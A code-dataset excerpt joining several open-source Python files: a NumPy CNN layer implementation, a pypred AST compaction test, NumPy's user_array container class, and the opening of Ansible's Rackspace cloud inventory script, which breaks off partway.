num = 0 #num of elements in column not num of samples in row
delta = None #n*m array for backward computation
name = None
type = None # layer type: CONV_TYPE, FC_TYPE, ACTIVATE_TYPE
images = None
width = None
height = None
channel = None
def forward_compute(self):
pass
def backward_compute(self):
pass
def SetLast(self,lastLayer):
self.last_layer = lastLayer
def SetNext(self,nextLayer):
self.next_layer = nextLayer
def storeParameters(self): #钩子函数,有需要子类就进行实现
pass
class ActivateLayer(BaseLayer):
type = ACTIVATE_TYPE
def SetLast(self,lastLayer):
self.last_layer = lastLayer
self.num = lastLayer.num
self.channel = lastLayer.channel
self.width = lastLayer.width
self.height = lastLayer.height
class InputLayer(BaseLayer):
# for convolution NN
images = None
channel = None
width = None
height = None
type = None
def __init__(self,channel,height=1,width=1):
self.channel = channel
self.width = width
self.height = height
self.num = channel*width*height
def setValue(self,value):
self.images = value
m = np.size(self.images,0)
self.value = self.images.reshape(m,self.channel*self.height*self.width)
self.num = self.channel*self.height*self.width
class BaseConvolutionLayer(BaseLayer):
type = CONV_TYPE
channel = None
squareSize = None
width = None
height = None
stride = None
def __init__(self,squareSize,stride):
self.squareSize = squareSize
self.stride = stride
def SetLast(self,lastLayer):
super().SetLast(lastLayer)
self.width = int((lastLayer.width-self.squareSize)/self.stride + 1)
self.height = int((lastLayer.height-self.squareSize)/self.stride + 1)
def unRollImages(self,index):
i = index
old_images = self.last_layer.images
m,old_channel,old_width,old_height = old_images.shape
newData = []
#Process unroll the data
for c in range(old_channel):
tmp = []
for h in range(0,old_height-self.squareSize+1,self.stride):
for w in range(0,old_width-self.squareSize+1,self.stride):
tmp.append(old_images[i,c,h:h+self.squareSize,w:w+self.squareSize].reshape(1,self.squareSize**2))
newData.append(tmp)
newData = np.array(newData).reshape(old_channel,self.width*self.height,self.squareSize**2)
newData = newData.transpose(0,2,1)
return newData
def unRollImagesForConv(self,index):
'''对上一层第index张图片展开
得到 新width*新height, 卷积核平方*旧channel数 这样二维size的上层的图片
'''
i = index
old_images = self.last_layer.images
m,old_channel,old_height,old_width = old_images.shape
newData = []
#Process unroll the data
for h in range(0,old_height-self.squareSize+1,self.stride):
for w in range(0,old_width-self.squareSize+1,self.stride):
tmp = []
for c in range(old_channel):
tmp.append(old_images[i,c,h:h+self.squareSize,w:w+self.squareSize].reshape(1,self.squareSize**2))
#h,w像素位置的,一个个通道添加到列表,得到old_channel * squaireSize平方的形式
tmp = np.array(tmp).reshape(1,self.squareSize**2*old_channel)
#对此点进行reshape,把形式变成一整行,并添加到newData
newData.append(tmp)
#这里就相当于把卷积后的像素点所需区域,一行行的添加到列表
newData = np.array(newData).reshape(self.width*self.height,self.squareSize**2*old_channel)
return newData
class ConvolutionLayer(BaseConvolutionLayer):
filters = None
bias = None
epsilon = 0.1
grad_filters = None
rate = 0.3
grad_bias = None
output_layer = None
old_unroll_images_list = None
def __init__(self,channel,squareSize,stride=1):
super().__init__(squareSize,stride)
self.channel = channel
def rate_modify(self):
if self.output_layer == None:
p = self.next_layer
while p.next_layer != None:
p = p.next_layer
self.output_layer = p
costValue = self.output_layer.costValue
if costValue >1:
self.rate = 0.2
elif costValue >0.5:
self.rate = 0.1
elif costValue >0.05:
self.rate = 0.05
elif costValue >0.02:
self.rate = 0.03
elif costValue >0.01:
self.rate = 0.01
elif costValue >0.005:
self.rate = 0.004
def initParameters(self):
try:
parameterFile = np.load(self.name+'.npz')
self.filters = parameterFile['arr_0']
self.bias = parameterFile['arr_1']
except FileNotFoundError as err:
self.filters = np.random.rand(self.squareSize**2*self.last_layer.channel,self.channel)*self.epsilon*2-self.epsilon
self.bias = np.random.rand(1,self.channel)*self.epsilon*2-self.epsilon
def storeParameters(self):
np.savez(self.name+'.npz',self.filters,self.bias)
def SetLast(self,lastLayer):
super().SetLast(lastLayer)
self.initParameters()
self.num = self.channel*self.height*self.width
pass
def forward_compute(self):
old_images = self.last_layer.images
m,old_channel,old_width,old_height = old_images.shape
result = []
self.old_unroll_images_list = []
for i in range(m):
#compute the data
newData = self.unRollImagesForConv(i)
self.old_unroll_images_list.append(newData)
convImage = newData.dot(self.filters)
convImage+=self.bias
convImage = convImage.transpose()
result.append(convImage)
#reshape the data
self.images = np.array(result).reshape(m,self.channel,self.height,self.width)
self.value = self.images.reshape(m,self.channel*self.height*self.width)
def backward_compute(self):
self.rate_modify()
m = np.size(self.images,0)
self.delta = self.delta.reshape(m,self.channel,self.height,self.width)
filters_grad = np.zeros([self.squareSize**2*self.last_layer.channel,self.channel])
bias_grad = np.zeros([1,self.channel])
lastDelta = np.zeros([m,self.last_layer.channel,self.last_layer.height,self.last_layer.width])
for i in range(m):
oldImage = self.old_unroll_images_list[i]
tmpDelta = self.delta[i,:,:,:].reshape(self.channel,self.height*self.width).transpose()
newDelta = tmpDelta.dot(self.filters.transpose()) #format(width*height, squareSize**2 * oldchannel)
for c in range(self.last_layer.channel):
for h in range(self.height):
for w in range(self.width):
lastW = w*self.stride
lastH = h*self.stride
startSquare = self.squareSize**2*c
tmpValue = newDelta[h*self.width+w,startSquare:startSquare+self.squareSize**2].reshape(self.squareSize,self.squareSize)
lastDelta[i,c,lastH:lastH+self.squareSize,lastW:lastW+self.squareSize] += tmpValue
new_grad = oldImage.transpose().dot(tmpDelta)
bias_grad += np.sum(tmpDelta,0)
filters_grad+=new_grad
filters_grad/=(1.0*m)
bias_grad/=(1.0*m)
self.grad_bias = bias_grad #store in object
self.bias-=bias_grad*self.rate
self.grad_filters = filters_grad #store in object
self.filters-=filters_grad*self.rate
self.last_layer.delta = lastDelta
pass
class PoolingLayer(BaseConvolutionLayer):
images = None
channel = None
squareSize = None
stride = None
width = None
height = None
def __init__(self,squareSize,stride):
super().__init__(squareSize,stride)
def SetLast(self,lastLayer):
super().SetLast(lastLayer)
self.channel = lastLayer.channel
self.num = self.channel*self.height*self.width
class MaxPoolingLayer(PoolingLayer):
maxIndex = None
def __init__(self,squareSize,stride):
super().__init__(squareSize,stride)
def SetLast(self,lastLayer):
super().SetLast(lastLayer)
def forward_compute(self):
old_images = self.last_layer.images
m,old_channel,old_width,old_height = old_images.shape
result = []
self.maxIndex = []
for i in range(m):
newData = self.unRollImages(i)
#compute the data
self.maxIndex.append(list(np.argmax(newData,1)))
result.append(list(np.max(newData,1)))
self.maxIndex = np.array(self.maxIndex).reshape(m,self.channel,self.width*self.height)
#reshape the data
self.images = np.array(result).reshape(m,self.channel,self.height,self.width)
self.value = self.images.reshape(m,self.channel*self.height*self.width)
def backward_compute(self):
m = np.size(self.images,0)
self.delta = self.delta.reshape(m,self.channel,self.height,self.width)
newDelta = np.zeros([m,self.last_layer.channel,self.last_layer.height,self.last_layer.width])
for i in range(m):
for j in range(self.channel):
for h in range(self.height):
for w in range(self.width):
tmpLoc = self.maxIndex[i,j,h*self.width+w]
relativeH = tmpLoc//self.squareSize
relativeW = tmpLoc - relativeH * self.squareSize
lastW = w*self.stride+relativeW
lastH = h*self.stride+relativeH
newDelta[i,j,lastH,lastW] += self.delta[i,j,h,w]
self.last_layer.delta = newDelta
pass
class AvgPoolingLayer(PoolingLayer):
w = None
bias = None
old_unroll_images_list = []
grad_w = None
rate = 0.1
def __init__(self,squareSize,stride):
super().__init__(squareSize,stride)
def SetLast(self,lastLayer):
super().SetLast(lastLayer)
self.w = np.ones([self.channel,1])*1.0/self.squareSize**2
self.bias = np.random.rand(self.channel,1)
def forward_compute(self):
old_images = self.last_layer.images
m,old_channel,old_width,old_height = old_images.shape
result = []
self.old_unroll_images_list = []
for i in range(m):
newData = self.unRollImages(i)
self.old_unroll_images_list.append(newData)
#compute the data
computeSum = np.sum(newData,1).reshape(self.channel,self.height*self.width)
result.append(list(computeSum*self.w+self.bias))
#reshape the data
self.images = np.array(result).reshape(m,self.channel,self.height,self.width)
self.value = self.images.reshape(m,self.channel*self.height*self.width)
def backward_compute(self):
m,old_channel,old_width,old_height = self.last_layer.images.shape
oldDelta = np.zeros([m,old_channel,old_height,old_width])
w_grad = np.zeros([self.channel,1])
bias_grad = np.zeros([self.channel,1])
for i in range(m):
tmpDelta = self.delta[i,:].reshape(self.channel,self.height*self.width)
old_unroll_image = self.old_unroll_images_list[i]
computeSum = np.sum(old_unroll_image,1).reshape(self.channel,self.height*self.width)
for c in range(self.channel):
for h in range(self.height):
for w in range(self.width):
lastW = w*self.stride
lastH = h*self.stride
tmpValue = tmpDelta[c,h*self.width+w]
oldDelta[i,c,lastH:lastH+self.squareSize,lastW:lastW+self.squareSize] += tmpValue*self.w[c,0]
w_grad[c,0]+=computeSum[c,h*self.width+w]*tmpValue
bias_grad[c,0]+=tmpValue
w_grad/=(1.0*m)
bias_grad/=(1.0*m)
self.grad_w = w_grad
self.w -= self.grad_w*self.rate
self.bias -= bias_grad*self.rate
self.last_layer.delta = oldDelta
class FullCrossLayer(BaseLayer):
type = FC_TYPE
theta = None
grad_theta = None
epsilon = 0.1
rate = 0.3
output_layer = None
def __init__(self,num):
self.num = num
pass
def rate_modify(self):
if self.output_layer == None:
p = self.next_layer
while p.next_layer != None:
p = p.next_layer
self.output_layer = p
costValue = self.output_layer.costValue
if costValue >1:
self.rate = 0.2
elif costValue >0.5:
self.rate = 0.1
elif costValue >0.05:
self.rate = 0.05
elif costValue >0.02:
self.rate = 0.03
elif costValue >0.01:
self.rate = 0.01
elif costValue >0.005:
self.rate = 0.004
def initParameters(self):
try:
parameterFile = np.load(self.name+'.npz')
self.theta = parameterFile['arr_0']
except FileNotFoundError as err:
self.theta = np.random.rand(self.last_layer.num+1,self.num)*2*self.epsilon-self.epsilon
def storeParameters(self):
np.savez(self.name+'.npz',self.theta)
def SetLast(self,lastLayer):
super().SetLast(lastLayer)
self.initParameters()
pass
def forward_compute(self):
m = np.size(self.last_layer.value,0)
tmp = np.hstack((np.ones([m,1]),self.last_layer.value))
self.value = tmp.dot(self.theta)
def backward_compute(self):
self.rate_modify()
m = np.size(self.last_layer.value,0)
#self.delta = self.next_layer.theta.transpose().dot(self.next_layer.delta)
tmp = np.hstack((np.ones([m,1]),self.last_layer.value))
self.last_layer.delta = self.delta.dot(self.theta.transpose())
self.last_layer.delta = self.last_layer.delta[:,1:]
self.grad_theta = tmp.transpose().dot(self.delta)/(1.0*m)
self.theta -= self.grad_theta*self.rate
class SigmoidLayer(ActivateLayer):
def __init__(self):
pass
def forward_compute(self):
if self.last_layer.type == CONV_TYPE:
m = np.size(self.last_layer.images,0)
self.images = 1.0/(1+np.exp(-self.last_layer.value))
self.value = self.images.reshape(m,self.channel*self.height*self.width)
else:
self.value = 1.0/(1+np.exp(-self.last_layer.value))
def backward_compute(self):
if self.last_layer.type == CONV_TYPE:
m = np.size(self.images,0)
self.delta = self.delta.reshape(m, self.channel, self.height, self.width)
self.last_layer.delta = self.delta*self.images*(1-self.images)
else:
self.last_layer.delta = self.delta * self.value * (1-self.value)
pass
class TanhLayer(ActivateLayer):
def __init__(self):
pass
def forward_compute(self):
if self.last_layer.type == CONV_TYPE:
m = np.size(self.last_layer.images, 0)
self.images = np.tanh(self.last_layer.images)
self.value = self.images.reshape(m, self.channel*self.height*self.width)
else:
self.value = np.tanh(self.last_layer.value)
def backward_compute(self):
if self.last_layer.images == CONV_TYPE:
m = np.size(self.images, 0)
self.delta = self.delta.reshape(m, self.channel, self.height, self.width)
self.last_layer.delta = self.delta*(1-self.images**2)
else:
self.last_layer.delta = self.delta*(1-self.value**2)
class ReLuLayer(ActivateLayer):
alpha = 1
def __init__(self):
pass
def forward_compute(self):
if self.last_layer.type == CONV_TYPE:
m = np.size(self.last_layer.images, 0)
self.images = np.maximum(0, self.alpha*self.last_layer.images)
self.value = self.images.reshape(m, self.channel*self.height*self.width)
else:
self.value = np.maximum(0,self.alpha*self.last_layer.value)
def backward_compute(self):
m = np.size(self.value,0)
if self.last_layer.type == CONV_TYPE:
self.delta = self.delta.reshape(m, self.channel, self.height, self.width)
tmp = self.images.copy()
tmp[tmp <= 0] = 0
tmp[tmp > 0] = self.alpha
self.last_layer.delta = self.delta*tmp
else:
tmp = self.value.copy()
tmp[tmp <= 0] = 0
tmp[tmp > 0] = self.alpha
self.last_layer.delta = self.delta*tmp
class OutputLayer(BaseLayer):
h = None #hippothesis
y = None #standard output
lamb = 0
costFunc = None
costValue = None
def __init__(self):
pass
def LMS(self):
res = np.sum((self.h-self.y)**2)/(2.0*np.size(self.y, 0))
self.costValue = res
return res
def SoftMax(self):
self.costValue = -np.sum(self.y*np.log(self.h))/(1.0*np.size(self.y, 0))
return self.costValue
def init(self,costFuncName='LMS'):
if costFuncName == 'LMS':
self.costFunc = self.LMS
return True
elif costFuncName == 'SoftMax':
self.costFunc = self.SoftMax
return True
return False
def setY(self, y):
self.y = y
def forward_compute(self):
if self.costFunc == self.LMS:
self.h = self.last_layer.value
elif self.costFunc == self.SoftMax:
m = np.size(self.last_layer.value,0)
fenmu = np.sum(np.exp(self.last_layer.value),axis=1).reshape(m,1)
self.h = np.exp(self.last_layer.value)/fenmu
self.costValue=self.costFunc()
def backward_compute(self):
self.last_layer.delta = self.h-self.y
| gpl-3.0 |
grigi/pypred | tests/unit/test_compact.py | 2 | 1849 | from pypred import ast, compact
class TestCompact(object):
def test_compact(self):
l = ast.Literal('foo')
v = ast.Number(42)
gt = ast.CompareOperator('>', l, v)
l1 = ast.Literal('foo')
v1 = ast.Number(42)
lt = ast.CompareOperator('<', l1, v1)
n = ast.LogicalOperator('or', gt, lt)
compact.compact(n)
# Literal and number should be de-dupped
assert l is n.right.left
assert v is n.right.right
def test_names(self):
n1 = ast.Literal("foo")
assert ("Literal", "foo") == compact.node_name(n1)
n2 = ast.Number(12)
assert ("Number", 12) == compact.node_name(n2)
n3 = ast.Constant(True)
assert ("Constant", True) == compact.node_name(n3)
n4 = ast.Regex("^tubez$")
assert ("Regex", "^tubez$") == compact.node_name(n4)
n5 = ast.Undefined()
assert "Undefined" == compact.node_name(n5)
n6 = ast.Empty()
assert "Empty" == compact.node_name(n6)
n7 = ast.NegateOperator(n3)
assert ("NegateOperator", ("Constant", True)) == compact.node_name(n7)
n8 = ast.CompareOperator('=', n1, n2)
n8_name = compact.node_name(n8)
assert ("CompareOperator", "=", ("Literal", "foo"), ("Number", 12)) == n8_name
n9 = ast.MatchOperator(n1, n4)
n9_name = compact.node_name(n9)
assert ("MatchOperator", ("Literal", "foo"), ("Regex", "^tubez$")) == n9_name
n10 = ast.ContainsOperator(n1, n2)
n10_name = compact.node_name(n10)
assert ("ContainsOperator", ("Literal", "foo"), ("Number", 12.0)) == n10_name
n11 = ast.LogicalOperator('and', n1, n3)
n11_name = compact.node_name(n11)
assert ("LogicalOperator", "and", ("Literal", "foo"), ("Constant", True)) == n11_name
| bsd-3-clause |
dato-code/numpy | numpy/lib/user_array.py | 111 | 7764 | """
Standard container-class for easy multiple-inheritance.
Try to inherit from the ndarray instead of using this class as this is not
complete.
"""
from __future__ import division, absolute_import, print_function
from numpy.core import (
array, asarray, absolute, add, subtract, multiply, divide,
remainder, power, left_shift, right_shift, bitwise_and, bitwise_or,
bitwise_xor, invert, less, less_equal, not_equal, equal, greater,
greater_equal, shape, reshape, arange, sin, sqrt, transpose
)
from numpy.compat import long
class container(object):
def __init__(self, data, dtype=None, copy=True):
self.array = array(data, dtype, copy=copy)
def __repr__(self):
if len(self.shape) > 0:
return self.__class__.__name__ + repr(self.array)[len("array"):]
else:
return self.__class__.__name__ + "(" + repr(self.array) + ")"
def __array__(self, t=None):
if t:
return self.array.astype(t)
return self.array
# Array as sequence
def __len__(self):
return len(self.array)
def __getitem__(self, index):
return self._rc(self.array[index])
def __getslice__(self, i, j):
return self._rc(self.array[i:j])
def __setitem__(self, index, value):
self.array[index] = asarray(value, self.dtype)
def __setslice__(self, i, j, value):
self.array[i:j] = asarray(value, self.dtype)
def __abs__(self):
return self._rc(absolute(self.array))
def __neg__(self):
return self._rc(-self.array)
def __add__(self, other):
return self._rc(self.array + asarray(other))
__radd__ = __add__
def __iadd__(self, other):
add(self.array, other, self.array)
return self
def __sub__(self, other):
return self._rc(self.array - asarray(other))
def __rsub__(self, other):
return self._rc(asarray(other) - self.array)
def __isub__(self, other):
subtract(self.array, other, self.array)
return self
def __mul__(self, other):
return self._rc(multiply(self.array, asarray(other)))
__rmul__ = __mul__
def __imul__(self, other):
multiply(self.array, other, self.array)
return self
def __div__(self, other):
return self._rc(divide(self.array, asarray(other)))
def __rdiv__(self, other):
return self._rc(divide(asarray(other), self.array))
def __idiv__(self, other):
divide(self.array, other, self.array)
return self
def __mod__(self, other):
return self._rc(remainder(self.array, other))
def __rmod__(self, other):
return self._rc(remainder(other, self.array))
def __imod__(self, other):
remainder(self.array, other, self.array)
return self
def __divmod__(self, other):
return (self._rc(divide(self.array, other)),
self._rc(remainder(self.array, other)))
def __rdivmod__(self, other):
return (self._rc(divide(other, self.array)),
self._rc(remainder(other, self.array)))
def __pow__(self, other):
return self._rc(power(self.array, asarray(other)))
def __rpow__(self, other):
return self._rc(power(asarray(other), self.array))
def __ipow__(self, other):
power(self.array, other, self.array)
return self
def __lshift__(self, other):
return self._rc(left_shift(self.array, other))
def __rshift__(self, other):
return self._rc(right_shift(self.array, other))
def __rlshift__(self, other):
return self._rc(left_shift(other, self.array))
def __rrshift__(self, other):
return self._rc(right_shift(other, self.array))
def __ilshift__(self, other):
left_shift(self.array, other, self.array)
return self
def __irshift__(self, other):
right_shift(self.array, other, self.array)
return self
def __and__(self, other):
return self._rc(bitwise_and(self.array, other))
def __rand__(self, other):
return self._rc(bitwise_and(other, self.array))
def __iand__(self, other):
bitwise_and(self.array, other, self.array)
return self
def __xor__(self, other):
return self._rc(bitwise_xor(self.array, other))
def __rxor__(self, other):
return self._rc(bitwise_xor(other, self.array))
def __ixor__(self, other):
bitwise_xor(self.array, other, self.array)
return self
def __or__(self, other):
return self._rc(bitwise_or(self.array, other))
def __ror__(self, other):
return self._rc(bitwise_or(other, self.array))
def __ior__(self, other):
bitwise_or(self.array, other, self.array)
return self
def __pos__(self):
return self._rc(self.array)
def __invert__(self):
return self._rc(invert(self.array))
def _scalarfunc(self, func):
if len(self.shape) == 0:
return func(self[0])
else:
raise TypeError(
"only rank-0 arrays can be converted to Python scalars.")
def __complex__(self):
return self._scalarfunc(complex)
def __float__(self):
return self._scalarfunc(float)
def __int__(self):
return self._scalarfunc(int)
def __long__(self):
return self._scalarfunc(long)
def __hex__(self):
return self._scalarfunc(hex)
def __oct__(self):
return self._scalarfunc(oct)
def __lt__(self, other):
return self._rc(less(self.array, other))
def __le__(self, other):
return self._rc(less_equal(self.array, other))
def __eq__(self, other):
return self._rc(equal(self.array, other))
def __ne__(self, other):
return self._rc(not_equal(self.array, other))
def __gt__(self, other):
return self._rc(greater(self.array, other))
def __ge__(self, other):
return self._rc(greater_equal(self.array, other))
def copy(self):
return self._rc(self.array.copy())
def tostring(self):
return self.array.tostring()
def byteswap(self):
return self._rc(self.array.byteswap())
def astype(self, typecode):
return self._rc(self.array.astype(typecode))
def _rc(self, a):
if len(shape(a)) == 0:
return a
else:
return self.__class__(a)
def __array_wrap__(self, *args):
return self.__class__(args[0])
def __setattr__(self, attr, value):
if attr == 'array':
object.__setattr__(self, attr, value)
return
try:
self.array.__setattr__(attr, value)
except AttributeError:
object.__setattr__(self, attr, value)
# Only called after other approaches fail.
def __getattr__(self, attr):
if (attr == 'array'):
return object.__getattribute__(self, attr)
return self.array.__getattribute__(attr)
#############################################################
# Test of class container
#############################################################
if __name__ == '__main__':
temp = reshape(arange(10000), (100, 100))
ua = container(temp)
# new object created begin test
print(dir(ua))
print(shape(ua), ua.shape) # I have changed Numeric.py
ua_small = ua[:3, :5]
print(ua_small)
# this did not change ua[0,0], which is not normal behavior
ua_small[0, 0] = 10
print(ua_small[0, 0], ua[0, 0])
print(sin(ua_small) / 3. * 6. + sqrt(ua_small ** 2))
print(less(ua_small, 103), type(less(ua_small, 103)))
print(type(ua_small * reshape(arange(15), shape(ua_small))))
print(reshape(ua_small, (5, 3)))
print(transpose(ua_small))
| bsd-3-clause |
wenottingham/ansible | contrib/inventory/rax.py | 21 | 16418 | #!/usr/bin/env python
# (c) 2013, Jesse Keating <jesse.keating@rackspace.com,
# Paul Durivage <paul.durivage@rackspace.com>,
# Matt Martz <matt@sivel.net>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Rackspace Cloud Inventory
Authors:
Jesse Keating <jesse.keating@rackspace.com,
Paul Durivage <paul.durivage@rackspace.com>,
Matt Martz <matt@sivel.net>
Description:
Generates inventory that Ansible can understand by making API request to
Rackspace Public Cloud API
When run against a specific host, this script returns variables similar to:
rax_os-ext-sts_task_state
rax_addresses
rax_links
rax_image
rax_os-ext-sts_vm_state
rax_flavor
rax_id
rax_rax-bandwidth_bandwidth
rax_user_id
rax_os-dcf_diskconfig
rax_accessipv4
rax_accessipv6
rax_progress
rax_os-ext-sts_power_state
rax_metadata
rax_status
rax_updated
rax_hostid
rax_name
rax_created
rax_tenant_id
rax_loaded
Configuration:
rax.py can be configured using a rax.ini file or via environment
variables. The rax.ini file should live in the same directory along side
this script.
The section header for configuration values related to this
inventory plugin is [rax]
[rax]
creds_file = ~/.rackspace_cloud_credentials
regions = IAD,ORD,DFW
env = prod
meta_prefix = meta
access_network = public
access_ip_version = 4
Each of these configurations also has a corresponding environment variable.
An environment variable will override a configuration file value.
creds_file:
Environment Variable: RAX_CREDS_FILE
An optional configuration that points to a pyrax-compatible credentials
file.
If not supplied, rax.py will look for a credentials file
at ~/.rackspace_cloud_credentials. It uses the Rackspace Python SDK,
and therefore requires a file formatted per the SDK's specifications.
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
regions:
Environment Variable: RAX_REGION
An optional environment variable to narrow inventory search
scope. If used, needs a value like ORD, DFW, SYD (a Rackspace
datacenter) and optionally accepts a comma-separated list.
environment:
Environment Variable: RAX_ENV
A configuration that will use an environment as configured in
~/.pyrax.cfg, see
https://github.com/rackspace/pyrax/blob/master/docs/getting_started.md
meta_prefix:
Environment Variable: RAX_META_PREFIX
Default: meta
A configuration that changes the prefix used for meta key/value groups.
For compatibility with ec2.py set to "tag"
access_network:
Environment Variable: RAX_ACCESS_NETWORK
Default: public
A configuration that will tell the inventory script to use a specific
server network to determine the ansible_ssh_host value. If no address
is found, ansible_ssh_host will not be set. Accepts a comma-separated
list of network names, the first found wins.
access_ip_version:
Environment Variable: RAX_ACCESS_IP_VERSION
Default: 4
A configuration related to "access_network" that will attempt to
determine the ansible_ssh_host value for either IPv4 or IPv6. If no
address is found, ansible_ssh_host will not be set.
Acceptable values are: 4 or 6. Values other than 4 or 6
will be ignored, and 4 will be used. Accepts a comma-separated list,
the first found wins.
Examples:
List server instances
$ RAX_CREDS_FILE=~/.raxpub rax.py --list
List servers in ORD datacenter only
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD rax.py --list
List servers in ORD and DFW datacenters
$ RAX_CREDS_FILE=~/.raxpub RAX_REGION=ORD,DFW rax.py --list
Get server details for server named "server.example.com"
$ RAX_CREDS_FILE=~/.raxpub rax.py --host server.example.com
Use the instance private IP to connect (instead of public IP)
$ RAX_CREDS_FILE=~/.raxpub RAX_ACCESS_NETWORK=private rax.py --list
"""
import os
import re
import sys
import argparse
import warnings
import collections
import ConfigParser
from six import iteritems
try:
import json
except ImportError:
import simplejson as json
try:
import pyrax
from pyrax.utils import slugify
except ImportError:
sys.exit('pyrax is required for this module')
from time import time
from ansible.constants import get_config, mk_boolean
NON_CALLABLES = (basestring, bool, dict, int, list, type(None))
def load_config_file():
p = ConfigParser.ConfigParser()
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'rax.ini')
try:
p.read(config_file)
except ConfigParser.Error:
return None
else:
return p
p = load_config_file()
def rax_slugify(value):
return 'rax_%s' % (re.sub('[^\w-]', '_', value).lower().lstrip('_'))
def to_dict(obj):
instance = {}
for key in dir(obj):
value = getattr(obj, key)
if isinstance(value, NON_CALLABLES) and not key.startswith('_'):
key = rax_slugify(key)
instance[key] = value
return instance
def host(regions, hostname):
hostvars = {}
for region in regions:
# Connect to the region
cs = pyrax.connect_to_cloudservers(region=region)
for server in cs.servers.list():
if server.name == hostname:
for key, value in to_dict(server).items():
hostvars[key] = value
# And finally, add an IP address
hostvars['ansible_ssh_host'] = server.accessIPv4
print(json.dumps(hostvars, sort_keys=True, indent=4))
def _list_into_cache(regions):
groups = collections.defaultdict(list)
hostvars = collections.defaultdict(dict)
images = {}
cbs_attachments = collections.defaultdict(dict)
prefix = get_config(p, 'rax', 'meta_prefix', 'RAX_META_PREFIX', 'meta')
try:
# Ansible 2.3+
networks = get_config(p, 'rax', 'access_network',
'RAX_ACCESS_NETWORK', 'public', value_type='list')
except TypeError:
# Ansible 2.2.x and below
networks = get_config(p, 'rax', 'access_network',
'RAX_ACCESS_NETWORK', 'public', islist=True)
try:
try:
ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
'RAX_ACCESS_IP_VERSION', 4, value_type='list'))
except TypeError:
ip_versions = map(int, get_config(p, 'rax', 'access_ip_version',
'RAX_ACCESS_IP_VERSION', 4, islist=True))
except:
ip_versions = [4]
else:
ip_versions = [v for v in ip_versions if v in [4, 6]]
if not ip_versions:
ip_versions = [4]
# Go through all the regions looking for servers
for region in regions:
# Connect to the region
cs = pyrax.connect_to_cloudservers(region=region)
if cs is None:
warnings.warn(
'Connecting to Rackspace region "%s" has caused Pyrax to '
'return None. Is this a valid region?' % region,
RuntimeWarning)
continue
for server in cs.servers.list():
# Create a group on region
groups[region].append(server.name)
# Check if group metadata key in servers' metadata
group = server.metadata.get('group')
if group:
groups[group].append(server.name)
for extra_group in server.metadata.get('groups', '').split(','):
if extra_group:
groups[extra_group].append(server.name)
# Add host metadata
for key, value in to_dict(server).items():
hostvars[server.name][key] = value
hostvars[server.name]['rax_region'] = region
for key, value in iteritems(server.metadata):
groups['%s_%s_%s' % (prefix, key, value)].append(server.name)
groups['instance-%s' % server.id].append(server.name)
groups['flavor-%s' % server.flavor['id']].append(server.name)
# Handle boot from volume
if not server.image:
if not cbs_attachments[region]:
cbs = pyrax.connect_to_cloud_blockstorage(region)
for vol in cbs.list():
if mk_boolean(vol.bootable):
for attachment in vol.attachments:
metadata = vol.volume_image_metadata
server_id = attachment['server_id']
cbs_attachments[region][server_id] = {
'id': metadata['image_id'],
'name': slugify(metadata['image_name'])
}
image = cbs_attachments[region].get(server.id)
if image:
server.image = {'id': image['id']}
hostvars[server.name]['rax_image'] = server.image
hostvars[server.name]['rax_boot_source'] = 'volume'
images[image['id']] = image['name']
else:
hostvars[server.name]['rax_boot_source'] = 'local'
try:
imagegroup = 'image-%s' % images[server.image['id']]
groups[imagegroup].append(server.name)
groups['image-%s' % server.image['id']].append(server.name)
except KeyError:
try:
image = cs.images.get(server.image['id'])
except cs.exceptions.NotFound:
groups['image-%s' % server.image['id']].append(server.name)
else:
images[image.id] = image.human_id
groups['image-%s' % image.human_id].append(server.name)
groups['image-%s' % server.image['id']].append(server.name)
# And finally, add an IP address
ansible_ssh_host = None
# use accessIPv[46] instead of looping address for 'public'
for network_name in networks:
if ansible_ssh_host:
break
if network_name == 'public':
for version_name in ip_versions:
if ansible_ssh_host:
break
if version_name == 6 and server.accessIPv6:
ansible_ssh_host = server.accessIPv6
elif server.accessIPv4:
ansible_ssh_host = server.accessIPv4
if not ansible_ssh_host:
addresses = server.addresses.get(network_name, [])
for address in addresses:
for version_name in ip_versions:
if ansible_ssh_host:
break
if address.get('version') == version_name:
ansible_ssh_host = address.get('addr')
break
if ansible_ssh_host:
hostvars[server.name]['ansible_ssh_host'] = ansible_ssh_host
if hostvars:
groups['_meta'] = {'hostvars': hostvars}
with open(get_cache_file_path(regions), 'w') as cache_file:
json.dump(groups, cache_file)
def get_cache_file_path(regions):
regions_str = '.'.join([reg.strip().lower() for reg in regions])
ansible_tmp_path = os.path.join(os.path.expanduser("~"), '.ansible', 'tmp')
if not os.path.exists(ansible_tmp_path):
os.makedirs(ansible_tmp_path)
return os.path.join(ansible_tmp_path,
'ansible-rax-%s-%s.cache' % (
pyrax.identity.username, regions_str))
def _list(regions, refresh_cache=True):
cache_max_age = int(get_config(p, 'rax', 'cache_max_age',
'RAX_CACHE_MAX_AGE', 600))
if (not os.path.exists(get_cache_file_path(regions)) or
refresh_cache or
(time() - os.stat(get_cache_file_path(regions))[-1]) > cache_max_age):
# Cache file doesn't exist or older than 10m or refresh cache requested
_list_into_cache(regions)
with open(get_cache_file_path(regions), 'r') as cache_file:
groups = json.load(cache_file)
print(json.dumps(groups, sort_keys=True, indent=4))
def parse_args():
parser = argparse.ArgumentParser(description='Ansible Rackspace Cloud '
'inventory module')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--list', action='store_true',
help='List active servers')
group.add_argument('--host', help='List details about the specific host')
parser.add_argument('--refresh-cache', action='store_true', default=False,
help=('Force refresh of cache, making API requests to'
'RackSpace (default: False - use cache files)'))
return parser.parse_args()
def setup():
default_creds_file = os.path.expanduser('~/.rackspace_cloud_credentials')
env = get_config(p, 'rax', 'environment', 'RAX_ENV', None)
if env:
pyrax.set_environment(env)
keyring_username = pyrax.get_setting('keyring_username')
# Attempt to grab credentials from environment first
creds_file = get_config(p, 'rax', 'creds_file',
'RAX_CREDS_FILE', None)
if creds_file is not None:
